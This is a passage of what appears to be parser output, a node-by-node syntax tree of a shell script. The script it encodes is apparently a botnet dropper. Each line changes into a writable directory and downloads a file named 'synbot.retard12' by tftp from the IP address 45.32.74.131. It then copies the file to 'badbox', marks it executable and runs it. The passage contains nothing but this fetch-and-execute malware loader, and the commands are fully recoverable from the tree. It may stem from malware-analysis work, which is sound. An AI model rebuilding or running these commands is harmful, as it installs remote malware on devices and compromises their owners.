      WordNode(lineno=15, pos=(1718, 1724), word='badbox'), pos=(1717, 1724), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1724, 1725)),
  CommandNode(lineno=15, pos=(1725, 1735), parts=[
    WordNode(lineno=15, pos=(1725, 1730), word='chmod'),
    WordNode(lineno=15, pos=(1731, 1733), word='+x'),
    WordNode(lineno=15, pos=(1734, 1735), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1735, 1736)),
  CommandNode(lineno=15, pos=(1736, 1744), parts=[
    WordNode(lineno=15, pos=(1736, 1744), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1745, 1887), parts=[
  CommandNode(lineno=16, pos=(1745, 1752), parts=[
    WordNode(lineno=16, pos=(1745, 1747), word='cd'),
    WordNode(lineno=16, pos=(1748, 1752), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1753, 1755)),
  CommandNode(lineno=16, pos=(1756, 1767), parts=[
    WordNode(lineno=16, pos=(1756, 1758), word='cd'),
    WordNode(lineno=16, pos=(1759, 1767), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1768, 1770)),
  CommandNode(lineno=16, pos=(1771, 1778), parts=[
    WordNode(lineno=16, pos=(1771, 1773), word='cd'),
    WordNode(lineno=16, pos=(1774, 1778), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1779, 1781)),
  CommandNode(lineno=16, pos=(1782, 1790), parts=[
    WordNode(lineno=16, pos=(1782, 1784), word='cd'),
    WordNode(lineno=16, pos=(1785, 1790), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1791, 1793)),
  CommandNode(lineno=16, pos=(1794, 1798), parts=[
    WordNode(lineno=16, pos=(1794, 1796), word='cd'),
    WordNode(lineno=16, pos=(1797, 1798), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1798, 1799)),
  CommandNode(lineno=16, pos=(1800, 1839), parts=[
    WordNode(lineno=16, pos=(1800, 1804), word='tftp'),
    WordNode(lineno=16, pos=(1805, 1807), word='-r'),
    WordNode(lineno=16, pos=(1808, 1823), word='synbot.retard12'),
    WordNode(lineno=16, pos=(1824, 1826), word='-g'),
    WordNode(lineno=16, pos=(1827, 1839), word='45.32.74.131'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1839, 1840)),
  CommandNode(lineno=16, pos=(1840, 1867), parts=[
    WordNode(lineno=16, pos=(1840, 1843), word='cat'),
    WordNode(lineno=16, pos=(1844, 1859), word='synbot.retard12'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1861, 1867), word='badbox'), pos=(1860, 1867), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1867, 1868)),
  CommandNode(lineno=16, pos=(1868, 1878), parts=[
    WordNode(lineno=16, pos=(1868, 1873), word='chmod'),
    WordNode(lineno=16, pos=(1874, 1876), word='+x'),
    WordNode(lineno=16, pos=(1877, 1878), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1878, 1879)),
  CommandNode(lineno=16, pos=(1879, 1887), parts=[
    WordNode(lineno=16, pos=(1879, 1887), word='./badbox'),
  ]),
])
